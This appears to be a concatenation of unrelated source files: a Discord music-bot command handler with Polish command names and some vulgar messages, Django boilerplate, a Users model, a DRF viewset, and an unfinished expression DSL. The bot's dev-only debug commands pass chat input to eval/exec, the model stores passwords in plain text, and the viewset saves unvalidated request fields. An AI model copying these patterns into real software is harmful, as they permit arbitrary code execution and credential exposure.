if player.current_entry.meta.get('channel', False) and player.current_entry.meta.get('author', False):
np_text = "Now {action}: **{title}** added by **{author}** {progress}\n\N{WHITE RIGHT POINTING BACKHAND INDEX} <{url}>".format(
action=action_text,
title=player.current_entry.title,
author=player.current_entry.meta['author'].name,
progress=prog_str,
url=player.current_entry.url
)
else:
np_text = "Now {action}: **{title}** {progress}\n\N{WHITE RIGHT POINTING BACKHAND INDEX} <{url}>".format(
action=action_text,
title=player.current_entry.title,
progress=prog_str,
url=player.current_entry.url
)
self.server_specific_data[server]['last_np_msg'] = await self.safe_send_message(channel, np_text)
await self._manual_delete_check(message)
else:
return Response(
'There are no songs queued! Queue something with {}play.'.format(self.config.command_prefix),
delete_after=30
)
async def cmd_dj(self, channel, server, author, voice_channel):
"""
Usage:
{command_prefix}dj
Call the bot to the summoner's voice channel.
"""
if not author.voice_channel:
raise exceptions.CommandError('NIE JESTES W KANALE TEKSTOWYM!')
voice_client = self.voice_client_in(server)
if voice_client and server == author.voice_channel.server:
await voice_client.move_to(author.voice_channel)
return
# move to _verify_vc_perms?
chperms = author.voice_channel.permissions_for(server.me)
if not chperms.connect:
log.warning("Cannot join channel \"{}\", no permission.".format(author.voice_channel.name))
return Response(
"```Cannot join channel \"{}\", no permission.```".format(author.voice_channel.name),
delete_after=25
)
elif not chperms.speak:
log.warning("Will not join channel \"{}\", no permission to speak.".format(author.voice_channel.name))
return Response(
"```Will not join channel \"{}\", no permission to speak.```".format(author.voice_channel.name),
delete_after=25
)
log.info("Joining {0.server.name}/{0.name}".format(author.voice_channel))
player = await self.get_player(author.voice_channel, create=True, deserialize=self.config.persistent_queue)
if player.is_stopped:
player.play()
if self.config.auto_playlist:
await self.on_player_finished_playing(player)
async def cmd_pauza(self, player):
"""
Usage:
{command_prefix}pauza
Pauses playback of the current song.
"""
if player.is_playing:
player.pause()
else:
raise exceptions.CommandError('Player is not playing.', expire_in=30)
async def cmd_odpauzuj(self, player):
"""
Usage:
{command_prefix}odpauzuj
Resumes playback of a paused song.
"""
if player.is_paused:
player.resume()
else:
raise exceptions.CommandError('Player is not paused.', expire_in=30)
async def cmd_mieszaj(self, channel, player):
"""
Usage:
{command_prefix}mieszaj
Shuffles the playlist.
"""
player.playlist.shuffle()
cards = ['\N{BLACK SPADE SUIT}', '\N{BLACK CLUB SUIT}', '\N{BLACK HEART SUIT}', '\N{BLACK DIAMOND SUIT}']
random.shuffle(cards)
hand = await self.send_message(channel, ' '.join(cards))
await asyncio.sleep(0.6)
for x in range(4):
random.shuffle(cards)
await self.safe_edit_message(hand, ' '.join(cards))
await asyncio.sleep(0.6)
await self.safe_delete_message(hand, quiet=True)
return Response("\N{OK HAND SIGN}", delete_after=15)
async def cmd_wyjeb(self, player, author):
"""
Usage:
{command_prefix}wyjeb
Clears the playlist.
"""
player.playlist.clear()
return Response('\N{PUT LITTER IN ITS PLACE SYMBOL}', delete_after=20)
async def cmd_skip(self, player, channel, author, message, permissions, voice_channel):
"""
Usage:
{command_prefix}skip
Skips the current song when enough votes are cast, or by the bot owner.
"""
if player.is_stopped:
raise exceptions.CommandError("Can't skip! The player is not playing!", expire_in=20)
if not player.current_entry:
if player.playlist.peek():
if player.playlist.peek()._is_downloading:
return Response("The next song (%s) is downloading, please wait." % player.playlist.peek().title)
elif player.playlist.peek().is_downloaded:
print("The next song will be played shortly. Please wait.")
else:
print("Something odd is happening. "
"You might want to restart the bot if it doesn't start working.")
else:
print("Something strange is happening. "
"You might want to restart the bot if it doesn't start working.")
if author.id == self.config.owner_id \
or permissions.instaskip \
or author == player.current_entry.meta.get('author', None):
player.skip() # check autopause stuff here
await self._manual_delete_check(message)
return
# TODO: ignore person if they're deaf or take them out of the list or something?
# Currently is recounted if they vote, deafen, then vote
num_voice = sum(1 for m in voice_channel.voice_members if not (
m.deaf or m.self_deaf or m.id in [self.config.owner_id, self.user.id]))
num_skips = player.skip_state.add_skipper(author.id, message)
skips_remaining = min(
self.config.skips_required,
math.ceil(self.config.skip_ratio_required / (1 / num_voice)) # Number of skips from config ratio
) - num_skips
if skips_remaining <= 0:
player.skip() # check autopause stuff here
return Response(
'your skip for **{}** was acknowledged.'
'\nThe vote to skip has been passed.{}'.format(
player.current_entry.title,
' Next song coming up!' if player.playlist.peek() else ''
),
reply=True,
delete_after=20
)
else:
# TODO: When a song gets skipped, delete the old x needed to skip messages
return Response(
'your skip for **{}** was acknowledged.'
'\n**{}** more {} required to vote to skip this song.'.format(
player.current_entry.title,
skips_remaining,
'person is' if skips_remaining == 1 else 'people are'
),
reply=True,
delete_after=20
)
async def cmd_volume(self, message, player, new_volume=None):
"""
Usage:
{command_prefix}volume (+/-)[volume]
Sets the playback volume. Accepted values are from 1 to 100.
Putting + or - before the volume will make the volume change relative to the current volume.
"""
if not new_volume:
return Response('Current volume: `%s%%`' % int(player.volume * 100), reply=True, delete_after=20)
relative = False
if new_volume[0] in '+-':
relative = True
try:
new_volume = int(new_volume)
except ValueError:
raise exceptions.CommandError('{} is not a valid number'.format(new_volume), expire_in=20)
vol_change = None
if relative:
vol_change = new_volume
new_volume += (player.volume * 100)
old_volume = int(player.volume * 100)
if 0 < new_volume <= 100:
player.volume = new_volume / 100.0
return Response('updated volume from %d to %d' % (old_volume, new_volume), reply=True, delete_after=20)
else:
if relative:
raise exceptions.CommandError(
'Unreasonable volume change provided: {}{:+} -> {}%. Provide a change between {} and {:+}.'.format(
old_volume, vol_change, old_volume + vol_change, 1 - old_volume, 100 - old_volume), expire_in=20)
else:
raise exceptions.CommandError(
'Unreasonable volume provided: {}%. Provide a value between 1 and 100.'.format(new_volume), expire_in=20)
async def cmd_kolejka(self, channel, player):
"""
Usage:
{command_prefix}kolejka
Prints the current song queue.
"""
lines = []
unlisted = 0
andmoretext = '* ... and %s more*' % ('x' * len(player.playlist.entries))
if player.current_entry:
# TODO: Fix timedelta garbage with util function
song_progress = ftimedelta(timedelta(seconds=player.progress))
song_total = ftimedelta(timedelta(seconds=player.current_entry.duration))
prog_str = '`[%s/%s]`' % (song_progress, song_total)
if player.current_entry.meta.get('channel', False) and player.current_entry.meta.get('author', False):
lines.append("Currently Playing: **%s** added by **%s** %s\n" % (
player.current_entry.title, player.current_entry.meta['author'].name, prog_str))
else:
lines.append("Now Playing: **%s** %s\n" % (player.current_entry.title, prog_str))
for i, item in enumerate(player.playlist, 1):
if item.meta.get('channel', False) and item.meta.get('author', False):
nextline = '`{}.` **{}** added by **{}**'.format(i, item.title, item.meta['author'].name).strip()
else:
nextline = '`{}.` **{}**'.format(i, item.title).strip()
currentlinesum = sum(len(x) + 1 for x in lines) # +1 is for newline char
if currentlinesum + len(nextline) + len(andmoretext) > DISCORD_MSG_CHAR_LIMIT:
if currentlinesum + len(andmoretext):
unlisted += 1
continue
lines.append(nextline)
if unlisted:
lines.append('\n*... and %s more*' % unlisted)
if not lines:
lines.append(
'There are no songs queued! Queue something with {}play.'.format(self.config.command_prefix))
message = '\n'.join(lines)
return Response(message, delete_after=30)
async def cmd_clean(self, message, channel, server, author, search_range=50):
"""
Usage:
{command_prefix}clean [range]
Removes up to [range] messages the bot has posted in chat. Default: 50, Max: 1000
"""
try:
float(search_range) # lazy check
search_range = min(int(search_range), 1000)
except:
return Response("enter a number. NUMBER. That means digits. `15`. Etc.", reply=True, delete_after=8)
await self.safe_delete_message(message, quiet=True)
def is_possible_command_invoke(entry):
valid_call = any(
entry.content.startswith(prefix) for prefix in [self.config.command_prefix]) # can be expanded
return valid_call and not entry.content[1:2].isspace()
delete_invokes = True
delete_all = channel.permissions_for(author).manage_messages or self.config.owner_id == author.id
def check(message):
if is_possible_command_invoke(message) and delete_invokes:
return delete_all or message.author == author
return message.author == self.user
if self.user.bot:
if channel.permissions_for(server.me).manage_messages:
deleted = await self.purge_from(channel, check=check, limit=search_range, before=message)
return Response('Cleaned up {} message{}.'.format(len(deleted), 's' * bool(deleted)), delete_after=15)
deleted = 0
async for entry in self.logs_from(channel, search_range, before=message):
if entry == self.server_specific_data[channel.server]['last_np_msg']:
continue
if entry.author == self.user:
await self.safe_delete_message(entry)
deleted += 1
await asyncio.sleep(0.21)
if is_possible_command_invoke(entry) and delete_invokes:
if delete_all or entry.author == author:
try:
await self.delete_message(entry)
await asyncio.sleep(0.21)
deleted += 1
except discord.Forbidden:
delete_invokes = False
except discord.HTTPException:
pass
return Response('Cleaned up {} message{}.'.format(deleted, 's' * bool(deleted)), delete_after=6)
async def cmd_pldump(self, channel, song_url):
"""
Usage:
{command_prefix}pldump url
Dumps the individual urls of a playlist
"""
try:
info = await self.downloader.extract_info(self.loop, song_url.strip('<>'), download=False, process=False)
except Exception as e:
raise exceptions.CommandError("Could not extract info from input url\n%s\n" % e, expire_in=25)
if not info:
raise exceptions.CommandError("Could not extract info from input url, no data.", expire_in=25)
if not info.get('entries', None):
# TODO: Retarded playlist checking
# set(url, webpageurl).difference(set(url))
if info.get('url', None) != info.get('webpage_url', info.get('url', None)):
raise exceptions.CommandError("This does not seem to be a playlist.", expire_in=25)
else:
return await self.cmd_pldump(channel, info.get(''))
linegens = defaultdict(lambda: None, **{
"youtube": lambda d: 'https://www.youtube.com/watch?v=%s' % d['id'],
"soundcloud": lambda d: d['url'],
"bandcamp": lambda d: d['url']
})
exfunc = linegens[info['extractor'].split(':')[0]]
if not exfunc:
raise exceptions.CommandError("Could not extract info from input url, unsupported playlist type.", expire_in=25)
with BytesIO() as fcontent:
for item in info['entries']:
fcontent.write(exfunc(item).encode('utf8') + b'\n')
fcontent.seek(0)
await self.send_file(channel, fcontent, filename='playlist.txt', content="Here's the url dump for <%s>" % song_url)
return Response("\N{OPEN MAILBOX WITH RAISED FLAG}", delete_after=20)
async def cmd_listids(self, server, author, leftover_args, cat='all'):
"""
Usage:
{command_prefix}listids [categories]
Lists the ids for various things. Categories are:
all, users, roles, channels
"""
cats = ['channels', 'roles', 'users']
if cat not in cats and cat != 'all':
return Response(
"Valid categories: " + ' '.join(['`%s`' % c for c in cats]),
reply=True,
delete_after=25
)
if cat == 'all':
requested_cats = cats
else:
requested_cats = [cat] + [c.strip(',') for c in leftover_args]
data = ['Your ID: %s' % author.id]
for cur_cat in requested_cats:
rawudata = None
if cur_cat == 'users':
data.append("\nUser IDs:")
rawudata = ['%s #%s: %s' % (m.name, m.discriminator, m.id) for m in server.members]
elif cur_cat == 'roles':
data.append("\nRole IDs:")
rawudata = ['%s: %s' % (r.name, r.id) for r in server.roles]
elif cur_cat == 'channels':
data.append("\nText Channel IDs:")
tchans = [c for c in server.channels if c.type == discord.ChannelType.text]
rawudata = ['%s: %s' % (c.name, c.id) for c in tchans]
rawudata.append("\nVoice Channel IDs:")
vchans = [c for c in server.channels if c.type == discord.ChannelType.voice]
rawudata.extend('%s: %s' % (c.name, c.id) for c in vchans)
if rawudata:
data.extend(rawudata)
with BytesIO() as sdata:
sdata.writelines(d.encode('utf8') + b'\n' for d in data)
sdata.seek(0)
# TODO: Fix naming (Discord20API-ids.txt)
await self.send_file(author, sdata, filename='%s-ids-%s.txt' % (server.name.replace(' ', '_'), cat))
return Response("\N{OPEN MAILBOX WITH RAISED FLAG}", delete_after=20)
async def cmd_perms(self, author, channel, server, permissions):
"""
Usage:
{command_prefix}perms
Sends the user a list of their permissions.
"""
lines = ['Command permissions in %s\n' % server.name, '```', '```']
for perm in permissions.__dict__:
if perm in ['user_list'] or permissions.__dict__[perm] == set():
continue
lines.insert(len(lines) - 1, "%s: %s" % (perm, permissions.__dict__[perm]))
await self.send_message(author, '\n'.join(lines))
return Response("\N{OPEN MAILBOX WITH RAISED FLAG}", delete_after=20)
@owner_only
async def cmd_setname(self, leftover_args, name):
"""
Usage:
{command_prefix}setname name
Changes the bot's username.
Note: This operation is limited by discord to twice per hour.
"""
name = ' '.join([name, *leftover_args])
try:
await self.edit_profile(username=name)
except discord.HTTPException:
raise exceptions.CommandError(
"Failed to change name. Did you change names too many times? "
"Remember name changes are limited to twice per hour.")
except Exception as e:
raise exceptions.CommandError(e, expire_in=20)
return Response("\N{OK HAND SIGN}", delete_after=20)
async def cmd_setnick(self, server, channel, leftover_args, nick):
"""
Usage:
{command_prefix}setnick nick
Changes the bot's nickname.
"""
if not channel.permissions_for(server.me).change_nickname:
raise exceptions.CommandError("Unable to change nickname: no permission.")
nick = ' '.join([nick, *leftover_args])
try:
await self.change_nickname(server.me, nick)
except Exception as e:
raise exceptions.CommandError(e, expire_in=20)
return Response("\N{OK HAND SIGN}", delete_after=20)
@owner_only
async def cmd_setavatar(self, message, url=None):
"""
Usage:
{command_prefix}setavatar [url]
Changes the bot's avatar.
Attaching a file and leaving the url parameter blank also works.
"""
if message.attachments:
thing = message.attachments[0]['url']
elif url:
thing = url.strip('<>')
else:
raise exceptions.CommandError("You must provide a URL or attach a file.", expire_in=20)
try:
with aiohttp.Timeout(10):
async with self.aiosession.get(thing) as res:
await self.edit_profile(avatar=await res.read())
except Exception as e:
raise exceptions.CommandError("Unable to change avatar: {}".format(e), expire_in=20)
return Response("\N{OK HAND SIGN}", delete_after=20)
async def cmd_disconnect(self, server):
await self.disconnect_voice_client(server)
return Response("\N{DASH SYMBOL}", delete_after=20)
async def cmd_restart(self, channel):
await self.safe_send_message(channel, "\N{WAVING HAND SIGN}")
await self.disconnect_all_voice_clients()
raise exceptions.RestartSignal()
async def cmd_spierdalaj(self, channel):
await self.safe_send_message(channel, "\N{WAVING HAND SIGN}")
await self.disconnect_all_voice_clients()
raise exceptions.TerminateSignal()
@dev_only
async def cmd_breakpoint(self, message):
log.critical("Activating debug breakpoint")
return
@dev_only
async def cmd_objgraph(self, channel, func='most_common_types()'):
import objgraph
await self.send_typing(channel)
if func == 'growth':
f = StringIO()
objgraph.show_growth(limit=10, file=f)
f.seek(0)
data = f.read()
f.close()
elif func == 'leaks':
f = StringIO()
objgraph.show_most_common_types(objects=objgraph.get_leaking_objects(), file=f)
f.seek(0)
data = f.read()
f.close()
elif func == 'leakstats':
data = objgraph.typestats(objects=objgraph.get_leaking_objects())
else:
data = eval('objgraph.' + func)
return Response(data, codeblock='py')
@dev_only
async def cmd_debug(self, message, _player, *, data):
codeblock = "```py\n{}\n```"
result = None
if data.startswith('```') and data.endswith('```'):
data = '\n'.join(data.rstrip('`\n').split('\n')[1:])
code = data.strip('` \n')
try:
result = eval(code)
except:
try:
exec(code)
except Exception as e:
traceback.print_exc(chain=False)
return Response("{}: {}".format(type(e).__name__, e))
if asyncio.iscoroutine(result):
result = await result
return Response(codeblock.format(result))
async def on_message(self, message):
await self.wait_until_ready()
message_content = message.content.strip()
if not message_content.startswith(self.config.command_prefix):
return
if message.author == self.user:
log.warning("Ignoring command from myself ({})".format(message.content))
return
if self.config.bound_channels and message.channel.id not in self.config.bound_channels and not message.channel.is_private:
return # if I want to log this I just move it under the prefix check
command, *args = message_content.split(' ') # Uh, doesn't this break prefixes with spaces in them (it doesn't, config parser already breaks them)
command = command[len(self.config.command_prefix):].lower().strip()
handler = getattr(self, 'cmd_' + command, None)
if not handler:
return
if message.channel.is_private:
if not (message.author.id == self.config.owner_id and command == 'wejdz'):
await self.send_message(message.channel, 'NIE PISZ NA PRIV BO CI WYKURWIE.')
return
if message.author.id in self.blacklist and message.author.id != self.config.owner_id:
log.warning("User blacklisted: {0.id}/{0!s} ({1})".format(message.author, command))
return
else:
log.info("{0.id}/{0!s}: {1}".format(message.author, message_content.replace('\n', '\n... ')))
user_permissions = self.permissions.for_user(message.author)
argspec = inspect.signature(handler)
params = argspec.parameters.copy()
sentmsg = response = None
# noinspection PyBroadException
try:
if user_permissions.ignore_non_voice and command in user_permissions.ignore_non_voice:
await self._check_ignore_non_voice(message)
handler_kwargs = {}
if params.pop('message', None):
handler_kwargs['message'] = message
if params.pop('channel', None):
handler_kwargs['channel'] = message.channel
if params.pop('author', None):
handler_kwargs['author'] = message.author
if params.pop('server', None):
handler_kwargs['server'] = message.server
if params.pop('player', None):
handler_kwargs['player'] = await self.get_player(message.channel)
if params.pop('_player', None):
handler_kwargs['_player'] = self.get_player_in(message.server)
if params.pop('permissions', None):
handler_kwargs['permissions'] = user_permissions
if params.pop('user_mentions', None):
handler_kwargs['user_mentions'] = list(map(message.server.get_member, message.raw_mentions))
if params.pop('channel_mentions', None):
handler_kwargs['channel_mentions'] = list(map(message.server.get_channel, message.raw_channel_mentions))
if params.pop('voice_channel', None):
handler_kwargs['voice_channel'] = message.server.me.voice_channel
if params.pop('leftover_args', None):
handler_kwargs['leftover_args'] = args
args_expected = []
for key, param in list(params.items()):
# parse (*args) as a list of args
if param.kind == param.VAR_POSITIONAL:
handler_kwargs[key] = args
params.pop(key)
continue
# parse (*, args) as args rejoined as a string
# multiple of these arguments will have the same value
if param.kind == param.KEYWORD_ONLY and param.default == param.empty:
handler_kwargs[key] = ' '.join(args)
params.pop(key)
continue
doc_key = '[{}={}]'.format(key, param.default) if param.default is not param.empty else key
args_expected.append(doc_key)
# Ignore keyword args with default values when the command had no arguments
if not args and param.default is not param.empty:
params.pop(key)
continue
# Assign given values to positional arguments
if args:
arg_value = args.pop(0)
handler_kwargs[key] = arg_value
params.pop(key)
if message.author.id != self.config.owner_id:
if user_permissions.command_whitelist and command not in user_permissions.command_whitelist:
raise exceptions.PermissionsError(
"This command is not enabled for your group ({}).".format(user_permissions.name),
expire_in=20)
elif user_permissions.command_blacklist and command in user_permissions.command_blacklist:
raise exceptions.PermissionsError(
"This command is disabled for your group ({}).".format(user_permissions.name),
expire_in=20)
# Invalid usage, return docstring
if params:
docs = getattr(handler, '__doc__', None)
if not docs:
docs = 'Usage: {}{} {}'.format(
self.config.command_prefix,
command,
' '.join(args_expected)
)
docs = dedent(docs)
await self.safe_send_message(
message.channel,
'```\n{}\n```'.format(docs.format(command_prefix=self.config.command_prefix)),
expire_in=60
)
return
response = await handler(**handler_kwargs)
if response and isinstance(response, Response):
content = response.content
if response.reply:
content = '{}, {}'.format(message.author.mention, content)
sentmsg = await self.safe_send_message(
message.channel, content,
expire_in=response.delete_after if self.config.delete_messages else 0,
also_delete=message if self.config.delete_invoking else None
)
except (exceptions.CommandError, exceptions.HelpfulError, exceptions.ExtractionError) as e:
log.error("Error in {0}: {1.__class__.__name__}: {1.message}".format(command, e), exc_info=True)
expirein = e.expire_in if self.config.delete_messages else None
alsodelete = message if self.config.delete_invoking else None
await self.safe_send_message(
message.channel,
'```\n{}\n```'.format(e.message),
expire_in=expirein,
also_delete=alsodelete
)
except exceptions.Signal:
raise
except Exception:
log.error("Exception in on_message", exc_info=True)
if self.config.debug_mode:
await self.safe_send_message(message.channel, '```\n{}\n```'.format(traceback.format_exc()))
finally:
if not sentmsg and not response and self.config.delete_invoking:
await asyncio.sleep(5)
await self.safe_delete_message(message, quiet=True)
async def on_voice_state_update(self, before, after):
if not self.init_ok:
return # Ignore stuff before ready
state = VoiceStateUpdate(before, after)
if state.broken:
log.voicedebug("Broken voice state update")
return
if state.resuming:
log.debug("Resumed voice connection to {0.server.name}/{0.name}".format(state.voice_channel))
if not state.changes:
log.voicedebug("Empty voice state update, likely a session id change")
return # Session id change, pointless event
################################
log.voicedebug("Voice state update for {mem.id}/{mem!s} on {ser.name}/{vch.name} -> {dif}".format(
mem = state.member,
ser = state.server,
vch = state.voice_channel,
dif = state.changes
))
if not state.is_about_my_voice_channel:
return # Irrelevant channel
if state.joining or state.leaving:
log.info("{0.id}/{0!s} has {1} {2}/{3}".format(
state.member,
'joined' if state.joining else 'left',
state.server,
state.my_voice_channel
))
if not self.config.auto_pause:
return
autopause_msg = "{state} in {channel.server.name}/{channel.name} {reason}"
auto_paused = self.server_specific_data[after.server]['auto_paused']
player = await self.get_player(state.my_voice_channel)
if state.joining and state.empty() and player.is_playing:
log.info(autopause_msg.format(
state = "Pausing",
channel = state.my_voice_channel,
reason = "(joining empty channel)"
).strip())
self.server_specific_data[after.server]['auto_paused'] = True
player.pause()
return
if not state.is_about_me:
if not state.empty(old_channel=state.leaving):
if auto_paused and player.is_paused:
log.info(autopause_msg.format(
state = "Unpausing",
channel = state.my_voice_channel,
reason = ""
).strip())
self.server_specific_data[after.server]['auto_paused'] = False
player.resume()
else:
if not auto_paused and player.is_playing:
log.info(autopause_msg.format(
state = "Pausing",
channel = state.my_voice_channel,
reason = "(empty channel)"
).strip())
self.server_specific_data[after.server]['auto_paused'] = True
player.pause()
async def on_server_update(self, before:discord.Server, after:discord.Server):
if before.region != after.region:
log.warning("Server \"%s\" changed regions: %s -> %s" % (after.name, before.region, after.region))
await self.reconnect_voice_client(after)
async def on_server_join(self, server:discord.Server):
log.info("Bot has been joined server: {}".format(server.name))
if not self.user.bot:
alertmsg = "<@{uid}> Hi I'm a musicbot please mute me."
if server.id == "81384788765712384" and not server.unavailable: # Discord API
playground = server.get_channel("94831883505905664") or discord.utils.get(server.channels, name='playground') or server
await self.safe_send_message(playground, alertmsg.format(uid="98295630480314368")) # fake abal
elif server.id == "129489631539494912" and not server.unavailable: # Rhino Bot Help
bot_testing = server.get_channel("134771894292316160") or discord.utils.get(server.channels, name='bot-testing') or server
await self.safe_send_message(bot_testing, alertmsg.format(uid="98295630480314368")) # also fake abal
log.debug("Creating data folder for server %s", server.id)
pathlib.Path('data/%s/' % server.id).mkdir(exist_ok=True)
async def on_server_remove(self, server: discord.Server):
log.info("Bot has been removed from server: {}".format(server.name))
log.debug('Updated server list:')
[log.debug(' - ' + s.name) for s in self.servers]
if server.id in self.players:
self.players.pop(server.id).kill()
async def on_server_available(self, server: discord.Server):
if not self.init_ok:
return # Ignore pre-ready events
log.debug("Server \"{}\" has become available.".format(server.name))
player = self.get_player_in(server)
if player and player.is_paused:
av_paused = self.server_specific_data[server]['availability_paused']
if av_paused:
log.debug("Resuming player in \"{}\" due to availability.".format(server.name))
self.server_specific_data[server]['availability_paused'] = False
player.resume()
async def on_server_unavailable(self, server: discord.Server):
log.debug("Server \"{}\" has become unavailable.".format(server.name))
player = self.get_player_in(server)
if player and player.is_playing:
log.debug("Pausing player in \"{}\" due to unavailability.".format(server.name))
self.server_specific_data[server]['availability_paused'] = True
player.pause()
|
[
"noreply@github.com"
] |
noreply@github.com
|
19ed9b12b8f92747a7d5730dd8e9cfa7b98d1e12
|
6ed0b6576857efc67901790dbf926c558d440bd7
|
/backend/manage.py
|
a6ec92e1ac1e5abe024afe74dc330d67aa5ff4bc
|
[] |
no_license
|
crowdbotics-apps/test-aline-0721-dev-7964
|
dae692cc48e757e0275c853ae975d90de97a1657
|
3104874e1b83a8863942ee6a10c2a8aceb6e52f5
|
refs/heads/master
| 2022-11-19T23:22:20.735744
| 2020-07-22T15:50:19
| 2020-07-22T15:50:19
| 281,442,246
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 644
|
py
|
#!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "test_aline_0721_dev_7964.settings")
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == "__main__":
main()
|
[
"team@crowdbotics.com"
] |
team@crowdbotics.com
|
b80ac7ea9d7671918a54c63f69fe2187f54ccda5
|
061cc9968cac30ca8c5aff4537c4332ae6ca2600
|
/MyCmdb/Users/models.py
|
46cebfa4541ab8c771c5ca2c7655830c658532c7
|
[] |
no_license
|
zhubingbi/-Company-script
|
14ebf83904e54e829ad1ad233d3faa1a8df3acd5
|
b5306e5f7214a1a887d65020f48afc88067645ff
|
refs/heads/master
| 2020-12-02T06:38:08.071754
| 2017-11-15T02:46:11
| 2017-11-15T02:46:11
| 96,868,079
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 777
|
py
|
# coding=utf-8
from django.db import models
# Create your models here.
class Users(models.Model):
user = models.CharField(max_length=32, verbose_name='用户名')
password = models.CharField(max_length=32, verbose_name='用户密码')
phone = models.CharField(max_length=32, verbose_name='注册电话')
birthday = models.CharField(max_length=32, verbose_name='用户生日')
email = models.EmailField(blank=True, null=True, verbose_name='邮箱')
groups = models.CharField(max_length=32, null=True, verbose_name='用户业务分组')
photo = models.ImageField(upload_to='uploadImg', blank=True, null=True, verbose_name='用户头像')
isadmin = models.CharField(max_length=32, blank=True, null=True, verbose_name='是否具有管理员权限')
|
[
"zhubingbi@gmail.com"
] |
zhubingbi@gmail.com
|
a1b9c909d2e60fb563ed2c58c3bf28e228f2e771
|
751691a21ed1d8c69c35f3cd9b9fd395dc5c1aa8
|
/{{cookiecutter.项目名称}}/{{cookiecutter.初始化app名称}}/custom_viewset.py
|
10b0164eb8f5f4fa01443e26d36608d2830e48cc
|
[] |
no_license
|
mtianyan/cookiecutter-drf-mtianyan
|
5899847f46e853a0ec5be9bcbf9e7294ce2b70cd
|
b1298f6c5b20149db4589ce127b2e6e0392552b6
|
refs/heads/master
| 2022-12-28T18:26:57.969693
| 2020-10-10T08:29:08
| 2020-10-10T08:29:08
| 275,175,974
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,619
|
py
|
from rest_framework import viewsets, status
from rest_framework.response import Response
from utils import change_key
class CustomViewSet(viewsets.ModelViewSet):
def retrieve(self, request, *args, **kwargs):
instance = self.get_object()
serializer = self.get_serializer(instance)
res = serializer.data
if "status" in res.keys():
res["status"] = str(res["status"])
return Response({
"code": 200,
"data": res
})
def create(self, request, *args, **kwargs):
serializer = self.get_serializer(data=request.data)
serializer.is_valid(raise_exception=True)
self.perform_create(serializer)
headers = self.get_success_headers(serializer.data)
return Response({'code': 200}, status=status.HTTP_201_CREATED, headers=headers)
def put(self, request, *args, **kwargs):
change_key(request)
update_fields = [one for one in request.data.keys() if one != self.serializer_class.Meta.model._meta.pk.name]
self.serializer_class.Meta.model(**request.data).save(update_fields=update_fields)
return Response({'code': 200, 'msg': '修改成功'})
# def destroy(self, request, *args, **kwargs):
# instance = self.get_object()
# self.perform_destroy(instance)
# return Response({'code': 200}, status=status.HTTP_200_OK)
def destroy(self, request, *args, **kwargs):
ids = kwargs["pk"].split(",")
self.serializer_class.Meta.model.objects.filter(pk__in=ids).delete()
return Response({
"code": 200
})
|
[
"1147727180@qq.com"
] |
1147727180@qq.com
|
44a6e5f1f5fda5f40b242e469cc4314b106c8306
|
e6b969b7c50de5ae61c4b76ec31a982d16523e46
|
/sym.py
|
3f88fe9fcc929640105de765ca5654c69c9dd65f
|
[] |
no_license
|
dlovemore/parle
|
7d52dc76716f3f8a5f085aa26277b2c52b98b098
|
e949c743b2760079eb3c3eb67198e69562521d20
|
refs/heads/master
| 2021-01-03T07:04:09.060552
| 2020-10-20T13:01:59
| 2020-10-20T13:01:59
| 239,972,201
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,418
|
py
|
class Base:
def __init__(self, *args):
self._args = args
@property
def args(self): return self._args
@args.setter
def args(self, value): self._args = value
def __repr__(self):
rargs = repr(list(self.args))[1:-1]
return f'{type(self).__name__}({rargs})'
class E(Base):
@property
def op(self):
return self.args[0]
@property
def exprs(self):
return self.args[1:]
@property
def lhs(self):
return self.args[1]
@property
def rhs(self):
return self.args[2]
@property
def a1(self):
return self.args[1]
@property
def a2(self):
return self.args[2]
def __add__(self, rhs):
return E('+',self,rhs)
def __contains__(self, lhs):
return E(' in ',lhs,self)
def __truediv__(self, rhs):
return E('/',self,rhs)
def __floordiv__(self, rhs):
return E('//',self,rhs)
def __and__(self, rhs):
return E('&',self,rhs)
def __xor__(self, rhs):
return E('^',self,rhs)
def __invert__(self):
return E('~_',self)
def __or__(self, rhs):
return E('|',self,rhs)
def __pow__(self, rhs):
return E('**',self,rhs)
def __getitem__(self, k):
return E('[]',self, k)
def __lshift__(self, rhs):
return E('<<',self, rhs)
def __mod__(self, rhs):
return E('%',self, rhs)
def __mul__(self, rhs):
return E('*',self, rhs)
def __matmul__(self, rhs):
return E('@',self, rhs)
def __neg__(self):
return E('-_',self)
def __pos__(self):
return E('+_',self)
def __rshift__(self, rhs):
return E('>>',self, rhs)
def __sub__(self, rhs):
return E('-',self, rhs)
def __lt__(self, rhs):
return E('<',self, rhs)
def __le__(self, rhs):
return E('<=',self, rhs)
def __eq__(self, rhs):
return E('==',self, rhs)
def __ne__(self, rhs):
return E('!=',self, rhs)
def __ge__(self, rhs):
return E('>=',self, rhs)
def __gt__(self, rhs):
return E('>',self, rhs)
def __call__(self, *args):
return E('_()',self, *args)
def dolet(k,v): return E('=',k,v)
class LetClause(Base):
def __getitem__(self, k):
if isinstance(k,tuple):
k=E(',',*k)
return E('=',E('args',*self.args), k)
class Let:
def __setitem__(self,k,v):
stmts += dolet(k,v)
def __call__(self,*args):
return LetClause(*args)
let=Let()
class Stmt:
def __init__(self,k):
self.op = k
def __getitem__(self, k):
if isinstance(k,tuple):
k=E(',',*k)
return E(self.op, k)
# Use like:
# let(x)[x+1]
# or [let(x)[4], let(Y)[X+1]]
class Env:
def __init__(self, globals, op='var'):
self.globals=globals
self.vars=dict()
self.op=op
def __call__(self, name):
if name not in self.vars:
v=E(self.op, name)
self.globals[name]=v
self.vars[name]=v
return self.vars[name]
def __getattr__(self, name):
return self(name)
var=Env(globals())
v=var
arg=var
class OnClause:
def __init__(self, e):
self.e=e
def __getitem__(self, rhs):
if isinstance(rhs, slice):
assert(rhs.step is None)
return E('?:', self.e, rhs.start, rhs.stop)
else:
return E('?', self.e, rhs)
class On:
def __call__(self, e):
return OnClause(e)
on=On()
IF=on
class LambdaClause:
def __init__(self, *args):
self.args=args
def __getitem__(self, rhs):
return E('λ',self.args,rhs)
class LambdaDefiner:
def __call__(self, *args):
